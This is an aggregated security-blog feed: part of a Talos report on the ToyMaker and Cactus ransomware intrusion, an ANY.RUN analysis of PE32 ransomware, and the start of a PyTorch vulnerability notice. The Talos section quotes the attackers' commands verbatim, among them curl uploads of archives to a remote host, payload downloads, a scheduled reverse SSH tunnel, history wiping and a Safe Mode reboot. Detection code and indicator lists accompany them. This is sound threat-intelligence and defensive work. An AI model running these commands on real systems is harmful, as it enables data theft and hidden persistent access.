The Cactus gang conducted their own reconnaissance and persistence, deploying their own set of malware instead of using LAGTOY as a vehicle into the enterprise. They initially accessed the compromised endpoint using the user credentials ToyMaker had obtained earlier with the Magnet RAM Capture tool.

Initial recon and network scans

Cactus immediately began network scans to identify systems of interest and to spread across the network. To do so, they first ran a WSMAN discovery script to enumerate all endpoints configured for PowerShell remoting.

Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File .\fs.ps1 result.csv
Intent: Remote System Discovery [T1018]

Command: C:\PerfLogs\Admin\7z.exe a -p<password> pss.7z .\result.csv
Command: C:\PerfLogs\Admin\curl.exe -k -T .\pss.7z hxxps[:]//<remote_ip>:8443
Intent: The scan results are compressed and sent to a remote server. Data exfiltration [T1048]

Command: C:\PerfLogs\Admin\7z.exe a -p<pwd> .\CP-SERVER3.7z .\CP-SERVER3.txt
Command: C:\PerfLogs\Admin\7z.exe a -p<pwd> .\FILEN01.7z .\FILEN01.txt
Command: C:\PerfLogs\Admin\curl.exe -k -T .\CP-SERVER3.7z hxxps[:]//<remote_ip>:8443
Command: C:\PerfLogs\Admin\curl.exe -p -k -T .\FILEN01.7z hxxps[:]//<remote_ip>:8443
Command: C:\PerfLogs\Admin\7z.exe a -p<pwd> .\FILE-SERVER.7z .\FILE-SERVER.txt
Command: C:\PerfLogs\Admin\curl.exe -k -T .\FILE-SERVER.7z hxxps[:]//<remote_ip>:8443
Intent: The same is done for other collected information. Data exfiltration [T1048]

Once the attackers had obtained the information they wanted, they cleaned up traces of their access:

Command: C:\Windows\system32\reg.exe delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
Intent: Indicator Removal: Clear Command History [T1070]

Command: C:\Windows\system32\reg.exe delete HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default /va /f
Command: C:\Windows\system32\reg.exe delete HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers /f
Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers
Command: C:\Windows\system32\attrib.exe %userprofile%\documents\Default.rdp -s -h
Intent: Indicator Removal: Clear Network Connection History and Configurations [T1070]

Command: net user support /delete
Intent: Indicator Removal: Clear Persistence [T1070]

Data Exfiltration

The harvested credentials gave ToyMaker access to a multitude of systems, on which the threat actor performed reconnaissance for valuable information. Files of interest were either archived and then exfiltrated using dual-use tools such as 7-Zip and curl, or transferred directly using file transfer utilities such as WinSCP [T1560, T1048]:

C:\PerfLogs\Admin\7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p -xr!*.ipa -xr!*.apk -xr!*.zip -xr!*.rar -xr!*.iso -xr!*.dll -xr!*.dl_ -xr!*.lib -xr!*.exe -xr!*.ex_ -xr!*.lnk -xr!*.pdb -xr!*.cab -xr!*.msp -xr!*.bak -xr!*.old -xr!*.bmp -xr!*.gif -xr!*.jpg -xr!*.png -xr!*.avi -xr!*.m4v -xr!*.mp4 -xr!*.mp3 -xr!*.wmv -xr!*.wav -xr!*.mov -xr!*.mkv -xr!*.log -xr!*.csv -xr!*.jar -xr!test -xr!tests -xr!jdk8 e:\tmp\<filename>

C:\PerfLogs\Admin\7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p<password> -xr!*.ipa -xr!*.apk -xr!*.zip -xr!*.rar -xr!*.iso -xr!*.dll -xr!*.dl_ -xr!*.lib -xr!*.exe -xr!*.ex_ -xr!*.lnk -xr!*.pdb -xr!*.cab -xr!*.msp -xr!*.bak -xr!*.old -xr!*.bmp -xr!*.gif -xr!*.jpg -xr!*.png -xr!*.avi -xr!*.m4v -xr!*.mp4 -xr!*.mp3 -xr!*.wmv -xr!*.wav -xr!*.mov -xr!*.mkv -xr!*.log -xr!*.csv -xr!*.jar -xr!test -xr!tests -xr!jdk8 e:\tmp\<filename>

On other endpoints the attackers discovered and archived what is believed to be the victim’s customer data for exfiltration as well [T1560, T1048]:

C:\Windows\system32\cmd.exe /c <path>\7z.exe a -t7z -mx0 -ssp -spf -v5g -y -r -mhe=on <path>\001.7z <path>\Private Folder\Customers\<path> -p<password>

The use of remote administration tools

Cactus used a variety of remote admin tools on different endpoints to maintain long-term access. The tools included:

  • eHorus Agent: Remote control software also known as Pandora RC
  • AnyDesk: Remote Desktop application
  • Remote Utilities for Windows Admin (RMS Remote Admin): A Russian-made remote management tool/platform
  • OpenSSH: SSH package included and available for installation with the Windows OS

The remote administration utilities were downloaded from remote, attacker-controlled locations via PowerShell and Impacket:

Commands run through Impacket:

Command: cmd.exe /Q /c powershell iwr -Uri http://<remote_IP>:7423/file.msi -OutFile C:\Programdata\f.msi 1> \\127.0.0.1\ADMIN$\__<random> 2>&1
Intent: Stage Capabilities: Upload Malware [T1608]

Command: cmd.exe /Q /c msiexec.exe /i C:\Programdata\f.msi /q EHUSER=<username> STARTEHORUSSERVICE=1 DESKTOPSHORTCUT=0 1> \\127.0.0.1\ADMIN$\__<random> 2>&1
Intent: System Binary Proxy Execution: Msiexec [T1218]

The trailing redirection (1> \\127.0.0.1\ADMIN$\__<random> 2>&1) is the output-capture idiom of Impacket's wmiexec-style execution, which writes command output to a file on the local ADMIN$ share and reads it back over SMB; that string in a process command line is a strong detection signal on its own.

In another instance, the attackers set up reverse SSH tunnels with OpenSSH: a scheduled task was created to connect back to the C2 server every hour, giving the actor a channel over which to accept and execute commands:

Command: SCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c c:\Windows\temp\sys_log.bat > c:\Windows\temp\log.txt
Intent: Scheduled Task/Job [T1053]

Command: SCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c FOR /L %N IN () DO (C:\ProgramData\ssh\ssh.exe -o "StrictHostKeyChecking no" root@<remote_ip> -p 443 -R 25369 -NCqf -i "C:\Windows\temp\syslog.txt" & timeout /t 15)
Intent: Scheduled Task/Job [T1053]; Remote Services: SSH [T1021]

The task name mimics Google's updater, the tunnel runs as SYSTEM over port 443 to blend in with HTTPS, and the FOR /L loop with a 15-second timeout wraps ssh.exe so the tunnel is re-established if it drops.

The Cactus affiliate takes operational security seriously: it strips access to the file containing the SSH private key used for the tunnel back to its infrastructure, so that under normal circumstances the victim cannot read the key.

Command: icacls C:\Windows\Temp\syslog.txt
Command: icacls.exe C:\Windows\temp\syslog.txt /c /t /inheritance:d
Command: icacls.exe C:\Windows\Temp\syslog.txt /c /t /remove BUILTIN\Administrators
Command: icacls.exe C:\Windows\Temp\syslog.txt /c /t /remove <userid>
Command: icacls.exe C:\Windows\temp\syslog.txt /inheritance:r /grant SYSTEM:F
Intent: File and Directory Permissions Modification: Windows File and Directory Permissions Modification [T1222]

syslog.txt is the private key the threat actor uses to initiate SSH connections back to actor-controlled infrastructure. The resulting ACL grants full control to SYSTEM only, which is enough for the scheduled task above because it runs as SYSTEM. For responders this is only an inconvenience: an administrator can take ownership of the file (takeown.exe or icacls /setowner) and re-grant access, and a collection agent running as SYSTEM reads it directly.

New user accounts

On some endpoints, the operators created new unauthorized user accounts, likely to facilitate deployment of ransomware. The accompanying Winlogon changes blank the legal-notice banner and set the new account as the default logon user with an auto-logon count of 1:

net user whiteninja <password> /add

reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v LegalNoticeText /t REG_SZ /d  /f

reg add HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon /v DefaultUserName /t REG_SZ /d whiteninja /f

reg add HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon /v AutoLogonCount /t REG_DWORD /d 1 /f

Abusing Safe Mode for defense evasion

During our investigation, Talos found that the threat actor executed commands to reboot compromised hosts into Safe Mode with the following commands:

bcdedit /set {default} safeboot minimal
shutdown -r -f -t 0

Booting into Safe Mode is likely intended to disable security products: the system loads only a minimal set of drivers and services, so some security products are inactive or limited, and the actor can then modify registry keys or settings to disable them completely [T1562.001].
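The Cactus command tables above (history wiping, 7-Zip plus curl exfiltration, the eHorus MSI install, the scheduled SSH tunnel, the icacls lockdown, the Winlogon auto-logon and the Safe Mode reboot) translate directly into process-creation detections. The following is an added example written for this edit, not Talos' detection content: a set of regex rules run over constructed command-line events, each rule tagged with the ATT&CK technique the write-up assigns to that command (the Winlogon rule carries our own T1136 mapping, since the post gives none). 203.0.113.5 (TEST-NET) stands in for the actor's real IPs, and the events are constructed from the tables, not from real telemetry.

```python
"""Command-line detection for the ToyMaker / Cactus tradecraft shown above.

Added example for this edit, not Talos' detection content. Each rule is a regex over a
process-creation command line, tagged with the ATT&CK technique the write-up assigns to
that command (the Winlogon auto-logon rule carries our own T1136 mapping). The sample
events below are constructed from the command tables in the post; 203.0.113.5
(TEST-NET) stands in for the actor's real IPs.
"""
import re

RULES = [  # (rule name, technique, pattern)
    ("RunMRU command history deleted", "T1070",
     r"\breg(\.exe)?\s+delete\s+\S*\\Explorer\\RunMRU\b"),
    ("RDP client history deleted", "T1070",
     r"\breg(\.exe)?\s+delete\s+.*\\Terminal Server Client\\(Default|Servers)\b"),
    ("Local account removed", "T1070",
     r"\bnet1?(\.exe)?\s+user\s+\S+\s+/delete\b"),
    ("Password-protected 7z archive created", "T1560",
     r"\b7z(\.exe)?\s+a\s.*(?<=\s)-p\S*"),
    ("Archive uploaded with curl -T to a non-443 HTTPS port", "T1048",
     r"\bcurl(\.exe)?\s+.*-T\s+\S+\.7z\s+https?://\S+:(?!443\b)\d+"),
    ("eHorus agent installed silently via msiexec", "T1218",
     r"\bmsiexec(\.exe)?\s+/i\s+.*STARTEHORUSSERVICE=1"),
    ("Scheduled task running an SSH reverse tunnel", "T1053/T1021",
     r"\bschtasks\s+/create\b.*\bssh(\.exe)?\s.*\s-R\s+\d+"),
    ("Administrators stripped from a file ACL", "T1222",
     r"\bicacls(\.exe)?\s+\S+.*(/remove\s+BUILTIN\\Administrators|/inheritance:r\s+/grant\s+SYSTEM:F)"),
    ("Next boot forced into Safe Mode", "T1562.001",
     r"\bbcdedit\s+/set\s+\{default\}\s+safeboot\s+minimal\b"),
    ("Winlogon auto-logon configured", "T1136 (our mapping)",
     r"\breg(\.exe)?\s+add\s+.*\\Winlogon\s+/v\s+(DefaultUserName|AutoLogonCount)\b"),
]
COMPILED = [(name, tech, re.compile(pat, re.IGNORECASE)) for name, tech, pat in RULES]


def match_rules(cmdline):
    """Return [(rule name, technique)] for every rule the command line trips."""
    return [(name, tech) for name, tech, rx in COMPILED if rx.search(cmdline)]


def scan(events):
    """events: iterable of {"host": ..., "cmdline": ...}. Returns [(host, rule name, technique)]."""
    return [(ev["host"], name, tech)
            for ev in events for name, tech in match_rules(ev["cmdline"])]


SAMPLE_EVENTS = [  # constructed: one event per technique from the tables above plus a benign control
    {"host": "ws01", "cmdline": r"C:\Windows\system32\reg.exe delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f"},
    {"host": "ws01", "cmdline": r"C:\Windows\system32\reg.exe delete HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers /f"},
    {"host": "ws01", "cmdline": "net user support /delete"},
    {"host": "fs01", "cmdline": r"C:\PerfLogs\Admin\7z.exe a -pS3cret pss.7z .\result.csv"},
    {"host": "fs01", "cmdline": r"C:\PerfLogs\Admin\curl.exe -k -T .\pss.7z https://203.0.113.5:8443"},
    {"host": "ws02", "cmdline": r"cmd.exe /Q /c msiexec.exe /i C:\Programdata\f.msi /q EHUSER=svc STARTEHORUSSERVICE=1 DESKTOPSHORTCUT=0"},
    {"host": "srv02", "cmdline": r'SCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c FOR /L %N IN () DO (C:\ProgramData\ssh\ssh.exe -o "StrictHostKeyChecking no" root@203.0.113.5 -p 443 -R 25369 -NCqf -i "C:\Windows\temp\syslog.txt" & timeout /t 15)'},
    {"host": "srv02", "cmdline": r"icacls.exe C:\Windows\Temp\syslog.txt /c /t /remove BUILTIN\Administrators"},
    {"host": "srv02", "cmdline": "bcdedit /set {default} safeboot minimal"},
    {"host": "srv02", "cmdline": r"reg add HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon /v DefaultUserName /t REG_SZ /d whiteninja /f"},
    {"host": "ws01", "cmdline": r"reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"},  # benign lookup
]

if __name__ == "__main__":
    for host, name, tech in scan(SAMPLE_EVENTS):
        print(f"{host:6} {tech:22} {name}")
```

The rules deliberately key on the combination that made each command suspicious in this intrusion (a 7z archive followed by curl -T to a non-standard port, icacls removing Administrators rather than any icacls call, a schtasks entry that spawns ssh with -R) so that routine administration, such as the reg query control event, does not fire them.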

Metasploit injected binaries

Cactus also makes extensive use of Metasploit shellcode-injected copies of the Windows binaries PuTTY and ApacheBench (a benchmarking tool for Apache HTTP servers) to execute code on compromised systems. These contact the same remote server that hosted the portable eHorus agent, 51[.]81[.]42[.]234, over ports 53, 443, 8343 and 9232. Cactus additionally employed Metasploit-generated ELF binaries communicating with the same C2, 51[.]81[.]42[.]234.

Metasploit shellcode communicating with the remote server.

Coverage 


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise (IOCs)

Hashes – LAGTOY

fdf977f0c20e7f42dd620db42d20c561208f85684d3c9efd12499a3549be3826

Metasploit shells

0a367cc7e7e297248fad57e27f83316b7606788db9468f59031fed811cfe4867

0bcfea4983cfc2a55a8ac339384ecd0988a470af444ea8f3b597d5fe5f6067fb

5831b09c93f305e7d0a49d4936478fac3890b97e065141f82cda9a0d75b1066d

691cc4a12fbada29d093e57bd02ca372bc10968b706c95370daeee43054f06e3

70077fde6c5fc5e4d607c75ff5312cc2fdf61ea08cae75f162d30fa7475880de

a95930ff02a0d13e4dbe603a33175dc73c0286cd53ae4a141baf99ae664f4132

c1bd624e83382668939535d47082c0a6de1981ef2194bb4272b62ecc7be1ff6b

Network IOCs

ToyMaker

209[.]141[.]43[.]37

194[.]156[.]98[.]155

158[.]247[.]211[.]51

39[.]106[.]141[.]68

47[.]117[.]165[.]166

195[.]123[.]240[.]2

75[.]127[.]0[.]235

149[.]102[.]243[.]100

Cactus

206[.]188[.]196[.]20

51[.]81[.]42[.]234

178[.]175[.]134[.]52

162[.]33[.]177[.]56

64[.]52[.]80[.]252

162[.]33[.]178[.]196

103[.]199[.]16[.]92

Cisco Talos Blog – Read More

Will super-smart AI be attacking us anytime soon?

What practical AI attacks exist today? “More than zero” is the answer – and they’re getting better.

WeLiveSecurity – Read More

Year in Review: Attacks on identity and MFA

For our third focused topic from Talos’ 2024 Year in Review, we tell the story of how identity has become the pivot point for adversarial campaigns.

The main themes of this story are credential abuse, Active Directory exploits, and MFA workarounds. Valid accounts were the #1 way attackers got in, and nearly half of identity attacks involved poking at AD. We also look at common MFA missteps (like no enrollment or misconfigured policies) and break down how attackers are bypassing protections with techniques like push fatigue and password spraying.

Take a look at this short but data-rich overview of identity attacks. For defenders, it can help you identify gaps in MFA implementations, understand the operational tradecraft attackers use post-authentication, and align your defenses with what is being seen in the wild.

For a 60 second overview, have a watch of this video:

For the full analysis, download Talos’ 2024 Year in Review today.

Cisco Talos Blog – Read More

PE32 Ransomware: A New Telegram-Based Threat on the Rise 

Editor’s note: The current article is authored by Mauro Eldritch, offensive security expert and threat intelligence analyst. You can find Mauro on X. 

There’s no shortage of ransomware these days. It’s everywhere, lurking in email attachments, hiding in cracked software, and making headlines almost daily. While some ransomware groups vanish or rebrand, new names step in to take their place, keeping security teams in a constant state of alert. 

One of the latest strains making the rounds is PE32 Ransomware, a newcomer that’s quickly gaining attention online, including on Twitter. Despite its amateur execution, it manages to encrypt files, communicate over Telegram, and cause real damage.

PE32: Key Takeaways

Image 1. PE32 Ransomware running on Windows 10 inside ANY.RUN’s Interactive Sandbox

In this report, Mauro Eldritch takes a closer look at how PE32 works, how it communicates, and why its chaotic behavior still poses a real threat. 

  • Fast encryption: Starts encryption after a simple prompt; targets visible folders like Desktop. 
  • Unique ransom setup: Two payment tiers: one to unlock files, another to stop data leaks. 
  • Telegram C2: Communicates entirely via Telegram Bot API; bot token is exposed in the code. 
  • Messy & loud: Drops marker files, triggers disk repair, and encrypts even useless files. 
  • No stealth: No obfuscation or evasion tricks; relies on basic Windows libraries. 
  • Immature but active: Still evolving, but already a threat due to poor security hygiene. 

Execution Flow and Initial Behavior 

Image 2. Desktop files encrypted with pe32s extension

When executed, the sample waits for the operator’s input to determine whether it should encrypt only the folder where it was dropped or the entire system (see Image 2).

Image 3. PE32-KEY folder

However, regardless of this selection, it immediately starts noisily encrypting the most visible locations, such as the desktop, appending the .pe32s extension (see Image 3).

Instead of dropping a ransom note directly onto the Desktop (as most ransomware does), PE32 creates a folder named PE32-KEY in the root of the C: drive. This folder contains several internal files used during execution:

  • context.pe32c, lock.pe32, pe32lockfile.lock – for internal tracking and state
  • ID – stores the victim’s unique identifier
  • README.txt – the actual ransom note

Image 4. PE32 Ransom Note

The ransom note stands out for its two-tiered payment model: one fee to unlock encrypted files, and another to prevent stolen data from being leaked. This approach differs from most ransomware strains, which typically bundle both into a single payment.  

Prices vary widely: 

  • $700 to $7,000 for individual machines or servers 
  • $10,000 to 2 BTC (or more) for corporate targets 

Victims are instructed to reach out via Telegram. If that fails, the attackers provide a Gmail address as a backup contact method, another sign of their operational inexperience. 

Image 5. Communication to Telegram Admin Group Chat, revealing Bot Token and Group ID

Telegram C2: Loud, Exposed, and Easy to Abuse 

Once PE32 finishes prompting the attacker for encryption scope, it hides its process window and shifts to background mode. From there, it begins broadcasting its activity to a hardcoded Telegram group via the Bot API. 

The first message looks like this: 

“[PE32 v4.0.1] [Armin] [Thu, 20 Feb 2025 17:44:39] []

NEW RUN ID: 58994073AC147486]”

If using Telegram as a C2 channel wasn’t already an OPSEC disaster, the actors also expose their Bot Token and Group Chat ID. 

Image 6. Communication to Telegram Admin Group Chat stating the encryption cycle status 

The malware then begins reporting its lifecycle to the Telegram group, detailing every step of its execution, as seen below:

“[PE32 v4.0.1] [Armin] [Thu, 20 Feb 2025 17:45:07] [58994073AC147486] 

Staring UltraFast Round C:\”

PE32 struggles to process certain files (or their extensions—misspelled as “extentions” in its messages): 

“[PE32 v4.0.1] [Armin] [Thu, 20 Feb 2025 17:47:08] [58994073AC147486] 

Unknown Extentions:  

[...] 

odbc: 1 0MB 

en_gb_e: 1 0MB 

fr_fr_p: 1 0MB 

xls4: 1 0MB 

xls6: 1 0MB 

xsx: 1 0MB 

nettcp: 1 0MB 

xls8: 1 0MB 

access: 1 0MB”

The encryption cycle concludes with three messages. The first one confirms that the “UltraFast” cycle has been completed, followed by two more messages indicating that the “Fast” and “Slow” cycles have also finished successfully. 

“[PE32 v4.0.1] [Armin] [Thu, 20 Feb 2025 17:47:08] [58994073AC147486] 

UltraFast Compeleted C:\”
Image 7. All communication is restricted to Telegram 

With no observable DNS or HTTP requests, we can confirm that this strain of PE32 Ransomware relies exclusively on Telegram Bots for communication. This tactic is commonly observed in the MaaS scene, particularly with certain Stealers, but is rarely used in the RaaS ecosystem. 

Image 8. ANY.RUN’s CFG option in action

CFG Dumping with ANY.RUN 

ANY.RUN’s Interactive Sandbox provides a CFG extraction function, allowing analysts to inspect the malware’s internal configuration. Unsurprisingly, the Telegram Bot Token is scattered throughout the code, making it trivially easy to trace the adversarial infrastructure—it’s almost impossible to miss, even by accident. 

Armed with this token, anyone can easily flood the attacker’s C2 with fake requests or worse, use the bot’s key to impersonate the bot and send messages to any Telegram user. 

By feeding the bot token into third-party tools like Matkap, threat hunters can automate the retrieval of all data exchanged through the bot, ranging from communications to encrypted files, and even victims’ encryption or decryption keys, as long as they were sent to or received from the bot. 
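What the CFG dump and the beacon format above give an analyst can be automated in a few lines. The following is an added example written for this edit; it is neither ANY.RUN's CFG extractor nor Matkap. It pulls the Bot API token and group chat ID out of a strings dump and parses the “[family] [operator] [timestamp] [run id] body” beacon format quoted above. The dump is constructed, with a fake token in the documented <bot id>:<secret> shape and a fake chat ID, so nothing here touches the real bot; the regex widths for the bot ID and secret are deliberately loose, since their exact lengths are an assumption.

```python
"""Recover the Telegram Bot API C2 details from a PE32 strings/config dump and parse its beacons.

Added example for this edit; it is neither ANY.RUN's CFG extractor nor Matkap. The dump
below is constructed, with a fake token in the documented <bot id>:<secret> shape and a
fake group chat ID, so nothing here touches the real bot. The 8-10 digit bot ID and the
token width are the commonly seen shapes, kept deliberately loose (assumption).
"""
import re

TOKEN_RE = re.compile(r"(?<!\d)(\d{8,10}):([A-Za-z0-9_-]{30,45})(?![A-Za-z0-9_-])")
CHAT_ID_RE = re.compile(r"chat_id=(-?\d{6,16})")   # group/supergroup IDs are negative
BEACON_RE = re.compile(
    r"^\[(?P<family>PE32 v[\d.]+)\]\s+\[(?P<operator>[^\]]*)\]\s+\[(?P<ts>[^\]]*)\]"
    r"\s+\[(?P<run_id>[0-9A-F]*)\]\s*(?P<body>.*)$", re.DOTALL)


def extract_bot_config(dump):
    """Return the distinct bot tokens, chat IDs and Bot API base URLs found in the dump."""
    tokens = sorted({m.group(0) for m in TOKEN_RE.finditer(dump)})
    chat_ids = sorted(set(CHAT_ID_RE.findall(dump)))
    return {"tokens": tokens, "chat_ids": chat_ids,
            "api_base": [f"https://api.telegram.org/bot{t}/" for t in tokens]}


def parse_beacon(text):
    """Split one '[family] [operator] [timestamp] [run id] body' message; None if not a beacon."""
    m = BEACON_RE.match(text.strip())
    if not m:
        return None
    fields = m.groupdict()
    fields["body"] = fields["body"].strip()
    return fields


def run_id_of(beacon):
    """The first beacon carries the run ID in the body, later ones in the fourth bracket."""
    if beacon["run_id"]:
        return beacon["run_id"]
    m = re.search(r"NEW RUN ID:\s*([0-9A-F]+)", beacon["body"])
    return m.group(1) if m else None


# Constructed strings dump: NUL-separated fragments in the shape the post describes.
SAMPLE_DUMP = (
    "PE32 v4.0.1\x00"
    "https://api.telegram.org/bot1234567890:AAEfakeTOKENfakeTOKENfakeTOKEN01234/sendMessage"
    "?chat_id=-1001234567890&text=\x00Unknown Extentions:\x00pe32lockfile.lock\x00"
)

if __name__ == "__main__":
    print(extract_bot_config(SAMPLE_DUMP))
    for msg in ("[PE32 v4.0.1] [Armin] [Thu, 20 Feb 2025 17:44:39] []\n\nNEW RUN ID: 58994073AC147486",
                "[PE32 v4.0.1] [Armin] [Thu, 20 Feb 2025 17:45:07] [58994073AC147486]\n\nStaring UltraFast Round C:\\"):
        b = parse_beacon(msg)
        print(run_id_of(b), "|", b["body"])
```

The base URL plus getMe is enough to confirm a recovered token is still live, and getUpdates returns the messages the bot has received; that is the access Matkap automates. Keep the run ID as the pivot when correlating beacons, since the first message carries it in the body and every later one in the fourth bracket.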

Image 9. Recon routines on PE32 

A Chaotic Codebase 

Beyond its network behavior, PE32 operates like a typical ransomware strain. It collects system information such as the computer’s GUID, hostname, software policy settings, and supported languages, a common technique used to avoid infecting machines in specific regions, likely to minimize legal consequences. 

Image 10. False (but not false) positives arise from PE32’s chaotic behavior

PE32’s untidy nature makes it somewhat difficult to read and profile. For instance, it places a file named “pe32lockfile.lock” in every encrypted folder, likely as a flag meaning “I was here already.”

When that file lands in directories belonging to Skype, Firefox or Chrome, it trips a good portion of detection rules, so the behaviour is worth noting.

Image 11. PE32’s reckless encryption cycle triggers chkdsk.exe to run

The chaos doesn’t stop there. PE32 also drops C:\bootTel.dat, a legitimate Windows telemetry file associated with chkdsk.exe (Disk Checker). Although harmless on its own, the creation of this file is directly tied to the ransomware’s activity.

By aggressively encrypting files across the C: drive, including non-critical system files, PE32 ends up triggering the disk repair utility. While it doesn’t halt system functionality, it does cause Windows to initiate self-repair checks, providing an additional footprint of the malware’s presence. 

With this, we now have additional indicators of PE32’s activity. 

Image 12. Useless files being encrypted, such as Chrome language files for Portuguese, Romanian and Russian

PE32 shows no logic in file selection. It encrypts everything in sight, regardless of extension or value. Chrome’s language packs (messages.json), static resources like .gif and .css files, and even incomplete extension data are all locked without discrimination. 

Image 12. ANY.RUN lets you inspect the libraries loaded and unloaded by a malware process

On the technical side, PE32 keeps things simple. There’s no use of exotic libraries or obfuscated function calls. It relies on the classic combo of ntdll.dll and kernel32.dll to execute processes and manipulate files, while crypt32.dll and bcrypt.dll handle encryption.

Image 13. ANYRUN automatic ATT&CK Matrix

It depends on schannel.dll, Windows’ native TLS/SSL to reach its C2 channel using HTTPS, and that’s it. Plain and simple! 





TTPs & IOCs 

Dissecting PE32 is challenging due to its unpredictable and erratic behavior. The ransomware triggers numerous detections, some legitimate, others the result of its careless execution, which can complicate analysis and lead to false trails. 

Fortunately, ANY.RUN’s automatic ATT&CK matrix and IOC collection make this task significantly easier. These features help analysts quickly identify behaviors and map them to known techniques, significantly reducing investigation time. 

Image 14. Telegram communication inside ANYRUN’s ATT&CK Matrix

One of the most notable techniques observed is T1102 – Web Service Communication, specifically communication via Telegram. Although not the most advanced tactic, it provides a clear indication of PE32’s reliance on a basic and exposed C2 channel. 

Image 16. PE32 encrypting Skype folder as seen by ANYRUN’s ATT&CK Matrix 

This behavior aligns with early-stage or poorly maintained ransomware, which typically lacks data exfiltration capabilities and instead focuses solely on encryption and basic status reporting. In this context, T1102 serves as a valuable early signal for identifying similar threats in the wild. 

PE32 Threat Impact 

The PE32 ransomware campaign introduces notable risks despite its unsophisticated design: 

  • For end users: Victims face potential data loss, system instability, and financial pressure from ransom demands. The dual-payment model adds further psychological manipulation by threatening data exposure. 
  • For organizations: While PE32 currently lacks data exfiltration, its ability to disrupt operations, encrypt shared resources, and leave behind recoverable indicators (e.g., lock files, telemetry triggers) makes it a growing concern, especially if it evolves. 
  • For security teams: The use of Telegram as a C2 channel, combined with erratic behavior and non-selective encryption, can complicate detection and response. Its reliance on public communication channels also introduces new monitoring and containment challenges. 
  • For the broader threat landscape: PE32 highlights a trend toward low-effort, fast-deploy ransomware strains, crafted with minimal obfuscation, relying on common tools, yet still capable of causing damage. Its open infrastructure and careless coding make it accessible for copycats and opportunistic attackers. 

Conclusion 

The analysis of PE32 Ransomware reveals how even basic, poorly coded malware can disrupt systems, encrypt valuable data, and leverage public platforms like Telegram for command and control.  

While it lacks advanced evasion or data theft capabilities, PE32 reflects the growing trend of fast-deploy, low-effort ransomware strains that still pose a real threat to individuals and organizations. 

By analyzing PE32 in real time using ANY.RUN’s Interactive Sandbox, we were able to fully observe its execution flow, uncover its communication channels, and extract key artifacts, without relying solely on static reverse engineering. 

Here’s how this kind of analysis brings value: 

  • Faster threat detection: Catch suspicious encryption activity and exposed infrastructure early. 
  • Full behavioral visibility: Monitor system changes, communication attempts, and encryption logic in real time. 
  • Reduced investigation time: Quickly correlate observable behavior with known techniques and IOCs. 
  • Improved incident response: Collect and share actionable indicators across teams. 
  • Stronger threat intelligence: Identify attacker mistakes, such as hardcoded credentials and bot tokens. 


Collect Indicators of Compromise

SHA256: 15cb6bd05a35fdbd9a7e53b092a1b0537c64cb5df08ee0262479c0cc24eafd8a
FilePath: C:\PE32-KEY\ID

SHA256: 5946bdeb8b7bf0603e99cefb15c083a37352fa8a916b2664bbb9f9027f44985b
FilePath: C:\PE32-KEY\README.txt

SHA256: c6ddc9c2852eddf30f945a50183e28d38f6b9b1bbad01aac52e9d9539482a433
Filename: PE32.exe

SHA256: 098ee778fca1bfd809499dac65f528ea727f2aee9c6eaf79fe662d9261086e4a
FilePath: C:\PE32-KEY\context.pe32c

SHA256: 9e561018034479df1493addca30f1d031b9185e1d66f15333b8ea79d16acf64b
FilePath: C:\PE32-KEY\lock.pe32

References

Matkap tool: github.com/0x6rss/matkap 

Sandbox analysis: https://app.any.run/tasks/58b336b0-baec-48bb-9675-b2f3d352b63c

The post PE32 Ransomware: A New Telegram-Based Threat on the Rise  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

Update PyTorch ASAP | Kaspersky official blog

A researcher has discovered a vulnerability in PyTorch, an open-source machine learning framework. The vulnerability, registered as CVE-2025-32434, is a Remote Code Execution (RCE) flaw with a CVSS rating of 9.3, which makes it critical. Under certain conditions, exploitation of CVE-2025-32434 lets an attacker run arbitrary code when a malicious AI model is loaded on the victim’s computer. Anyone using PyTorch is advised to update the framework to the latest version as soon as possible.

The CVE-2025-32434 vulnerability

